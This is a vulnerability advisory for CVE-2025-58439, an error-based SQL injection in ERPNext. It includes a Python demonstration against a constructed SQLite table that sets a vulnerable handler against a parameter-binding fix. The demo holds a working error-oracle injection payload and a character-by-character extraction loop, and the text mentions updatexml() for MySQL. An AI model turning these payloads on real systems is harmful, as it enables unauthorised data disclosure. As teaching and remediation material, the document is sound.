Error-Based SQL Injection Vulnerability in Frappe ERP Tool
CVE-2025-58439
8.1 HIGH
What is CVE-2025-58439?
ERPNext (the Frappe ERP application) before 14.89.2, and 15.0.0 through 15.75.1, did not adequately validate the parameters of certain endpoints. Parameter values reached SQL queries without being treated as plain data, so a crafted value could trigger database errors whose content discloses information to the caller (error-based SQL injection); the advisory cites application version details as the data exposed. Users are advised to update to 14.89.2 (14.x series) or 15.76.0 (15.x series).
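The following is an added illustration of the mechanism, not ERPNext/Frappe code and not the affected endpoint (the advisory does not name it). It uses a constructed in-memory SQLite table and a hypothetical version-lookup handler written two ways: pasting the parameter into the SQL text and returning the raw database error (vulnerable), and binding the parameter with a generic error response (fixed). Against the vulnerable handler, an attacker needs nothing more than the error/no-error distinction to read another row's version string one character at a time; the same payloads against the fixed handler are just an app name that does not exist. Table, column and function names are all assumptions made for this example.

```python
import sqlite3
import string

# Added illustration, not ERPNext/Frappe code. The table, rows and handler
# names are constructed for this example; the real endpoint is not named in
# the advisory.


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for an ERP database (made-up schema and rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE installed_apps (app_name TEXT PRIMARY KEY, app_version TEXT)")
    conn.executemany(
        "INSERT INTO installed_apps VALUES (?, ?)",
        [("erpnext", "15.75.1"), ("frappe", "15.80.0")],
    )
    return conn


def lookup_version_vulnerable(conn: sqlite3.Connection, app_name: str) -> dict:
    """Hypothetical vulnerable handler: the parameter is pasted into the SQL text
    and the raw database error message is returned to the caller."""
    query = f"SELECT app_version FROM installed_apps WHERE app_name = '{app_name}'"
    try:
        row = conn.execute(query).fetchone()
        return {"ok": True, "version": row[0] if row else None}
    except sqlite3.Error as exc:
        return {"ok": False, "error": str(exc)}


def lookup_version_fixed(conn: sqlite3.Connection, app_name: str) -> dict:
    """Hardened handler: the value is bound as a parameter, so it can only ever be
    compared as a string, and database errors are not echoed to the caller."""
    try:
        row = conn.execute(
            "SELECT app_version FROM installed_apps WHERE app_name = ?", (app_name,)
        ).fetchone()
        return {"ok": True, "version": row[0] if row else None}
    except sqlite3.Error:
        return {"ok": False, "error": "internal error"}


def oracle_payload(target_app: str, pos: int, guess: str) -> str:
    """Error-oracle payload for the vulnerable handler. In SQLite, abs() of
    -9223372036854775808 raises 'integer overflow', so the query fails exactly
    when the guessed character is correct. The CASE keeps the abs() argument
    row-dependent, so the engine cannot pre-evaluate it before choosing a branch."""
    return (
        "x' OR (SELECT abs(CASE WHEN substr(app_version, {pos}, 1) = '{guess}' "
        "THEN -9223372036854775808 ELSE 0 END) "
        "FROM installed_apps WHERE app_name = '{target}') -- "
    ).format(pos=pos, guess=guess, target=target_app)


def extract_via_error_oracle(handler, conn: sqlite3.Connection, target_app: str,
                             charset: str = string.digits + ".",
                             max_len: int = 16) -> str:
    """Recover target_app's version string one character at a time, using only
    whether each request errored. Returns '' when the handler gives no oracle."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if not handler(conn, oracle_payload(target_app, pos, ch))["ok"]:
                recovered += ch
                break
        else:
            break  # no character matched: end of string, or no oracle
    return recovered


def demo() -> tuple:
    conn = make_db()
    leaked = extract_via_error_oracle(lookup_version_vulnerable, conn, "frappe")
    blocked = extract_via_error_oracle(lookup_version_fixed, conn, "frappe")
    # With binding, the whole payload is just a non-existent app name.
    literal = lookup_version_fixed(conn, oracle_payload("frappe", 1, "1"))
    return leaked, blocked, literal


if __name__ == "__main__":
    print(demo())  # ('15.80.0', '', {'ok': True, 'version': None})
```

The SQLite overflow trick is only the portable way to get a conditional error here; against MariaDB/MySQL, which is what a production ERPNext site typically runs on, error-based extraction is usually faster because functions such as updatexml() place the value of an injected expression directly in the error text, so the attacker does not need a per-character oracle at all. The fix is the same in both cases: bind every parameter, and never return the database's own error message to the client.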
Affected Version(s)
erpnext >= 15.0.0, < 15.76.0 (fixed in 15.76.0)
erpnext < 14.89.2 (fixed in 14.89.2)
